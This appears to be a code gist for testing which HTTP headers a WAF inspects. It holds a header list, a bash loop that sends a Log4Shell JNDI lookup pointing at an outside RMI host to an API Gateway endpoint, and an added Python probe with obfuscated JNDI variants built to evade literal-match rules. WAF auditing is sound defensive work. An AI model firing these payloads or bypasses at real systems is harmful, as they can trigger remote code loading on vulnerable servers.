@6a6f6a6f
Created December 13, 2021 23:31
Referer
X-Api-Version
Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Cookie
Forwarded
Forwarded-For
Forwarded-For-Ip
Forwarded-Proto
From
TE
True-Client-IP
Upgrade
User-Agent
Via
Warning
Max-Forwards
Origin
Pragma
DNT
Cache-Control
X-Att-Deviceid
X-ATT-DeviceId
X-Correlation-ID
X-Csrf-Token
X-CSRFToken
X-Do-Not-Track
X-Foo
X-Foo-Bar
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Proto
X-Forwarded-Protocol
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Frame-Options
X-From
X-Geoip-Country
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-ProxyUser-Ip
X-Requested-With
X-Request-ID
X-UIDH
X-Wap-Profile
X-XSRF-TOKEN

#! /usr/bin/env bash
# Send a Log4Shell-style JNDI lookup in each header listed in headers.txt (the list above)
# and report which headers the WAF in front of the API Gateway stage blocks.
while IFS="" read -r HEADER || [ -n "$HEADER" ]; do
    [ -z "$HEADER" ] && continue   # skip blank lines: curl rejects an empty header name
    RESPONSE=$(
        curl --silent "https://8i17duelvl.execute-api.us-east-1.amazonaws.com/dev/pets" \
            -H "$HEADER: \${jndi:rmi://pudim.com}" \
            -H "Content-Type: application/json"
    )
    # A blocked request is recognised by this marker in the response body. The match is
    # case-sensitive, so set it to exactly what your WAF's block response contains.
    PATTERN='FORBIDDEN'
    if [[ "$RESPONSE" == *"$PATTERN"* ]]; then
        echo "[+] Header $HEADER is blocked!"
    else
        echo "[!] Header $HEADER passed!"
    fi
done <headers.txt
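The loop above sends one literal `${jndi:rmi://...}` per header and trusts a body string to tell blocked from passed. The following is an added example, not the gist author's code, that generalises the same probe: it classifies by HTTP status (AWS WAF answers 403 by default) with the body marker as a fallback, and it sends several spellings of the lookup per header, because a rule that matches only the literal `${jndi:` lets Log4j-equivalent forms such as `${${lower:j}ndi:...}` straight through. The callback host, the target URL and the simulated WAF are assumptions made for the example; point `probe()` at your own stage and headers.txt to run it for real.

```python
"""Probe which request headers (and which JNDI spellings) a WAF actually blocks.

Added example, not the gist author's code. One request per (header, payload
variant), classified by HTTP status rather than by a body string. The hosts,
paths and the simulated WAF below are assumptions for the example.
"""
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

CALLBACK_HOST = "collab.example"  # assumed placeholder; use your own listener

Sender = Callable[[str, Dict[str, str]], Tuple[int, str]]


def jndi_payloads(callback: str = CALLBACK_HOST) -> Dict[str, str]:
    """Literal ${jndi:...} plus obfuscations Log4j resolves but literal-match rules miss."""
    return {
        "plain": f"${{jndi:rmi://{callback}/a}}",
        "ldap": f"${{jndi:ldap://{callback}/a}}",
        "upper": f"${{JNDI:RMI://{callback}/a}}",
        "lower-nested": f"${{${{lower:j}}ndi:rmi://{callback}/a}}",
        "default-value": f"${{${{::-j}}${{::-n}}${{::-d}}${{::-i}}:rmi://{callback}/a}}",
    }


def classify(status: int, body: str) -> str:
    """'blocked' on a 403 (AWS WAF's default block response) or an explicit block marker."""
    if status == 403 or "forbidden" in body.lower():
        return "blocked"
    return "passed"


def http_send(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Real sender: one GET carrying the probe header; 4xx/5xx are returned, not raised."""
    req = urllib.request.Request(url, headers={**headers, "Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def simulated_waf_send(url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Constructed stand-in for a WAF with one naive rule: literal '${jndi:' in User-Agent only."""
    for name, value in headers.items():
        if name.lower() == "user-agent" and "${jndi:" in value:
            return 403, '{"message":"Forbidden"}'
    return 200, "[]"


def probe(url: str, header_names: List[str], send: Sender = http_send,
          payloads: Optional[Dict[str, str]] = None) -> Dict[str, Dict[str, str]]:
    """Return {header: {variant: 'blocked' | 'passed'}}, one request per pair."""
    payloads = payloads or jndi_payloads()
    results: Dict[str, Dict[str, str]] = {}
    for raw in header_names:
        name = raw.strip()
        if not name or name.startswith("#"):  # skip blank lines and comments in headers.txt
            continue
        results[name] = {}
        for variant, value in payloads.items():
            status, body = send(url, {name: value})
            results[name][variant] = classify(status, body)
    return results


def uncovered(results: Dict[str, Dict[str, str]]) -> List[Tuple[str, str]]:
    """(header, variant) pairs the WAF let through: the list to hand to whoever tunes the rules."""
    return [(h, v) for h, verdicts in results.items()
            for v, verdict in verdicts.items() if verdict == "passed"]


if __name__ == "__main__":
    # Usage: python probe.py https://target/path headers.txt   (no args: offline demo)
    if len(sys.argv) == 3:
        with open(sys.argv[2]) as fh:
            names = fh.read().splitlines()
        res = probe(sys.argv[1], names)
    else:
        res = probe("https://target.invalid/dev/pets", ["User-Agent", "X-Forwarded-For"],
                    send=simulated_waf_send)
    for header, variant in uncovered(res):
        print(f"[!] {header}: variant '{variant}' passed")
```

Run without arguments and the simulated WAF shows the failure mode the probe is for: it blocks the plain and `ldap` payloads in `User-Agent`, lets the upper-case and nested forms through, and inspects `X-Forwarded-For` not at all. Against a real stage, expect each header to cost one request per variant, so trim `jndi_payloads()` if the target is rate-limited.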